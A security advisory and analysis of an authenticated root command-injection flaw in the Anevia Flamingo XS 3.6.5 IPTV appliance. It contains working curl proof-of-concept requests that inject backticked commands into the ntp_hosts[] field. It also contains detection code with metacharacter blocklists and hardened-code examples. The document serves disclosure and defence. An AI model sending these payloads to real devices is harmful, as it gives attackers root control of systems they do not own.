Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution

Exploit Author: LiquidWorm
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: PHP
Published Date: 2023-06-14
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
                  Hardware revision: 1.1
                  SoapLive 2.4.0
                  SoapSystem 1.3.1

Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: The affected device suffers from an authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands, granting her system access
with root privileges.

Tested on: GNU/Linux 3.14.29 (x86_64)
           Apache/2.2.22 (Debian)
           PHP/5.6.0-0anevia2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php


13.04.2023

--


$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
        <td>uid=33(www-data)</td>
          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
        <td>gid=33(www-data)</td>
          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
        <td>groups=33(www-data),6(disk),25(floppy)</td>
          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>


---


$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
        <td>uid=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
        <td>gid=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
        <td>groups=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>


Anevia Flamingo XS 3.6.5: Authenticated Root Remote Code Execution Vulnerability

The Anevia Flamingo XS 3.6.5, a high-density IPTV head-end system for hospitality and corporate environments, suffers from an authenticated remote code execution (RCE) vulnerability. The flaw, disclosed by security researcher Gjoko "LiquidWorm" Krstic of Zero Science Lab, lets an attacker who holds valid credentials for the web interface execute arbitrary commands on the underlying system as root, which amounts to full control of the device.

Overview of the Affected System

Flamingo XS belongs to Ateme's Flamingo family of modular IPTV head-ends (the advisory's product summary describes the Flamingo XL model), which integrates satellite, cable, digital terrestrial and analog content sources into IP-based streaming networks. It serves as a central hub for delivering live TV and radio to set-top boxes (STBs), PCs and other IP-connected devices in enterprise and hotel settings.

The tested device runs a GNU/Linux 3.14.29 (x86_64) kernel with Apache/2.2.22 (Debian) and a vendor build of PHP, 5.6.0-0anevia2. Its web-based management interface (reached under /admin/ on the appliance; the 192.168.1.1 address in the proof of concept is the test target, not a fixed address) provides administrative control over configuration settings, including network time protocol (NTP) synchronization.

Exploitation Mechanism: Command Injection via NTP Hosts Parameter

The vulnerability arises from improper input validation in the time.php administrative endpoint. The ntp_hosts[] array parameter, which carries the list of NTP servers, is handed to a shell without sanitization.

When an authenticated user submits a request to update NTP settings (request=ntp, update=Apply), the server uses the ntp_hosts[] values in a shell command without escaping or filtering. An attacker can therefore wrap a command in backticks (`), which the shell interprets as command substitution and runs before the intended command. The page then re-renders the stored host list, which is how the output is read back: every whitespace-separated token of the command output lands in its own ntp_hosts[] hidden input, as the uid=, gid= and groups= entries in the proof of concept show.


curl -sL "http://192.168.1.1/admin/time.php" \
  -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" \
  -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp"

This request injects `id` into the ntp_hosts[] parameter. The server executes it and reflects the output into the page:

  • uid=33(www-data)
  • gid=33(www-data)
  • groups=33(www-data),6(disk),25(floppy)

The command ran as www-data, the Apache service account, which confirms the injection. Even at this stage the account is not harmless: membership in the disk group usually grants direct read and write access to block devices.

Escalation to Root Privileges

With injection confirmed, the next step is to check whether the web account can use sudo, by injecting `sudo id` the same way:


curl -sL "http://192.168.1.1/admin/time.php" \
  -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" \
  -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp"

The response now reveals:

  • uid=0(root)
  • gid=0(root)
  • groups=0(root)

The response shows the command running as root. Since the plain `id` call ran as www-data, the web server process itself is not privileged; the escalation comes from the sudo configuration, which lets www-data run commands as root without a password. The advisory does not show the sudoers rule, so whether it is limited to specific binaries or unrestricted is unknown; at a minimum, whatever the web interface is allowed to run as root is reachable through this injection.

Security Implications and Risk Assessment

The severity of this vulnerability follows from three factors:

  • Authentication requirement: the attacker needs valid credentials, or a live PHPSESSID cookie as in the proof of concept, for the admin interface. This rules out anonymous exploitation, but credential reuse, weak passwords and session theft can remove the barrier.
  • Remote code execution: commands run from any network location that can reach the admin interface; no local access is needed.
  • Root-level access: full system control, including file and service manipulation and persistence across reboots.

For enterprise environments, this means an attacker could:

  • Disable security monitoring or logging.
  • Install backdoors or remote access tools.
  • Modify broadcast schedules or content delivery.
  • Exfiltrate sensitive configuration data.
  • Reconfigure network settings to redirect traffic or enable unauthorized access.

Technical Deep Dive: Why This Happens

The root cause lies in the lack of input sanitization in the time.php script. The vendor's source is not public, so the snippet below illustrates the bug class rather than the actual code; it processes ntp_hosts[] the way the observed behaviour suggests:


foreach ($_POST['ntp_hosts'] as $host) {
    system("echo $host >> /etc/ntp.conf");
}

Here the form value is interpolated into a shell command string and passed to system(). The shell performs command substitution on the backticks before echo ever runs, so `id` executes with the privileges of the web server. $(...), ;, |, && and a newline give the attacker the same result, so stripping backticks alone would not fix it.

Whether the real script uses system(), exec(), shell_exec(), passthru() or PHP's own backtick operator (shell_exec() in disguise) makes no difference: all of them hand the string to /bin/sh and are equally susceptible when the input is not validated. A second, independent defect turns this into a root compromise: the proof of concept shows that www-data can invoke sudo without a password, so any command injection in the web tier inherits root.

Remediation and Mitigation Strategies

Immediate actions for administrators include:

  • Update firmware: move to a release newer than 3.6.5 if the vendor provides one; check the Ateme product page and the advisory for the status of a fix.
  • Restrict administrative access: limit the number of users with admin privileges, enforce strong, unique passwords and invalidate stale sessions, since a captured PHPSESSID is all the proof of concept needs.
  • Implement network segmentation: place the Flamingo XS behind firewalls and expose the admin interface only to trusted management networks.
  • Monitor for suspicious activity: alert on POSTs to /admin/time.php whose ntp_hosts[] values contain shell metacharacters, and on the host, on sudo invocations by www-data in auth.log and on shells spawned by Apache worker processes.
  • Remove the passwordless sudo rule: if the appliance allows editing /etc/sudoers, dropping the rule that lets www-data run commands as root confines the injection to the web account until a firmware fix arrives.
  • Disable unnecessary features: if NTP is not managed from the web UI, block access to time.php at the web server or firewall.
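The two detection signals from the list above, as an added example that is not part of the advisory or the vendor's software. It assumes two data sources: captured POST bodies for /admin/time.php (Apache's access log does not record request bodies, so these would come from a reverse proxy, WAF or packet capture) and Debian-style sudo entries in auth.log. The request bodies and log lines are constructed for the example; the first body is the one from the proof of concept.

```python
"""Detection for the ZSL-2023-5778 exploitation pattern.

Added example, not from the advisory or the vendor. Signals:
  1. a POST to /admin/time.php whose ntp_hosts[] values carry shell
     metacharacters (blocklist on purpose: detection wants recall);
  2. a sudo entry in auth.log where the invoking user is www-data.
"""
import re
from urllib.parse import parse_qs

# Characters that change meaning inside a /bin/sh command string.
SHELL_META = re.compile(r"[`$;|&<>(){}\n]")

# Format written by sudo's syslog logging on Debian (auth.log); the
# timestamp/host/pid prefix before "sudo:" is free text.
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=\S+\s+;\s+PWD=\S+\s+;"
    r"\s+USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)


def suspicious_ntp_post(path, body):
    """Return the ntp_hosts[] values that contain shell metacharacters, or []."""
    if path != "/admin/time.php":
        return []
    fields = parse_qs(body, keep_blank_values=True)  # decodes %5B%5D to []
    return [v for v in fields.get("ntp_hosts[]", []) if SHELL_META.search(v)]


def suspicious_sudo(line, web_user="www-data"):
    """Return (target_user, command) when the web account escalated via sudo."""
    m = SUDO_LINE.search(line)
    if m and m.group("user") == web_user:
        return m.group("target"), m.group("cmd")
    return None


# Constructed samples: the advisory's PoC body, a benign body, two auth.log lines.
SAMPLE_POSTS = [
    ("/admin/time.php",
     "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp"),
    ("/admin/time.php",
     "ntp_hosts%5B%5D=pool.ntp.org&ntp_hosts%5B%5D=&ntp_address=&update=Apply&request=ntp"),
]
SAMPLE_AUTH = [
    "Apr 13 10:15:02 flamingo sudo: www-data : TTY=unknown ; PWD=/var/www/admin ; "
    "USER=root ; COMMAND=/usr/bin/id",
    "Apr 13 10:16:40 flamingo sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; "
    "USER=root ; COMMAND=/bin/ls",
]


def scan(posts=SAMPLE_POSTS, auth_lines=SAMPLE_AUTH):
    """Run both checks and return a list of (signal, evidence) alerts."""
    alerts = []
    for path, body in posts:
        hits = suspicious_ntp_post(path, body)
        if hits:
            alerts.append(("ntp_hosts injection", hits))
    for line in auth_lines:
        hit = suspicious_sudo(line)
        if hit:
            alerts.append(("www-data sudo", hit))
    return alerts


if __name__ == "__main__":
    for signal, evidence in scan():
        print(f"{signal}: {evidence}")
```

The web-side rule is deliberately a blocklist of metacharacters, the opposite of what the application itself should do: a detector wants to catch variants (`$(...)`, `;`, `|`) even when the payload is not a valid host, while the application should accept only values that are. The sudo rule fires on any www-data escalation, regardless of command, because a web server account has no legitimate reason to reach root.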

Expert Insight: Lessons from this Vulnerability

This case underscores a fundamental principle in secure software development: never trust user input. Even when input is restricted to authenticated users, it must be sanitized, validated, and isolated from execution contexts.

For developers, the following best practices are essential:

  • Use allowlist validation for input fields: an NTP host is an IP address or an RFC 1123 hostname, and anything else is rejected outright.
  • Do not invoke a shell to write configuration: open and write the file from PHP (fopen()/file_put_contents()). Where a command really must be run, wrap every argument in escapeshellarg(); note that escapeshellarg() is a quoting helper, not a replacement for system(), and shell_exec() is no safer than system().
  • Treat metacharacter blocklists (`, $, ;, &, |) as defence in depth at most; an attacker looks for the character that was forgotten, while an allowlist has nothing to forget.
  • Apply least privilege: run the web process under a minimal account, and never grant that account passwordless sudo; the root escalation here needed no second vulnerability.
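The interpolation bug from the deep dive and the allowlist, no-shell fix from the list above, side by side. This is an added example written in Python so it runs stand-alone; it is not the vendor's PHP, and it assumes a hypothetical /etc/ntp.conf target path and the ntp_hosts[] semantics seen in the proof of concept (one empty slot always submitted, then the host entries). PHP equivalents are noted in the comments.

```python
"""Vulnerable vs. hardened handling of an ntp_hosts[] form field.

Added example, not the vendor's code. The vulnerable function reconstructs
the bug class the advisory implies (form value spliced into a shell command);
the hardened functions show allowlist validation and writing the file with
no shell at all. The config path is an assumption for the example.
"""
import ipaddress
import re
import shlex

NTP_CONF = "/etc/ntp.conf"  # assumed path; the advisory does not name the file

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# 1-63 characters each, not starting or ending with a hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def vulnerable_command(host, path=NTP_CONF):
    """Reconstruction of the bug: the value is interpolated into a command
    string, so /bin/sh applies command substitution to backticks (and honours
    $(...), ';', '|', '&&') before echo runs. Shown, not executed, here."""
    return f"echo server {host} >> {path}"


def quoted_command(host, path=NTP_CONF):
    """If a shell cannot be avoided, quote every argument (PHP: escapeshellarg()).
    The payload then reaches echo as a literal string."""
    return f"echo server {shlex.quote(host)} >> {shlex.quote(path)}"


def is_valid_ntp_host(value):
    """Allowlist: an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else
    (PHP: filter_var(FILTER_VALIDATE_IP) plus a preg_match() on the same pattern)."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))


def render_ntp_conf(hosts):
    """Build the ntp.conf fragment with no shell involved (PHP: file_put_contents()).
    A rejected value raises instead of being silently dropped, so the request fails."""
    lines = []
    for host in hosts:
        if host == "":
            continue  # the form always submits one empty ntp_hosts[] slot
        if not is_valid_ntp_host(host):
            raise ValueError(f"rejected ntp host: {host!r}")
        lines.append(f"server {host} iburst")
    return "".join(line + "\n" for line in lines)


if __name__ == "__main__":
    poc = "`id`"  # the advisory's payload, URL-decoded
    print("vulnerable:", vulnerable_command(poc))
    print("quoted:    ", quoted_command(poc))
    print(render_ntp_conf(["", "pool.ntp.org", "192.168.1.1"]), end="")
    try:
        render_ntp_conf(["", poc])
    except ValueError as exc:
        print("blocked:", exc)
```

The ordering matters: validation happens before any string is built, and the happy path never touches a shell, so quoting is a fallback rather than the primary control. Rejecting with an error rather than discarding the bad entry also leaves a trace in the web log that the detection rule above can use.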

Advisory and Reference

For detailed technical analysis and proof-of-concept code, refer to the official advisory:

Advisory ID ZSL-2023-5778
Advisory URL https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
Discovery Date 13 April 2023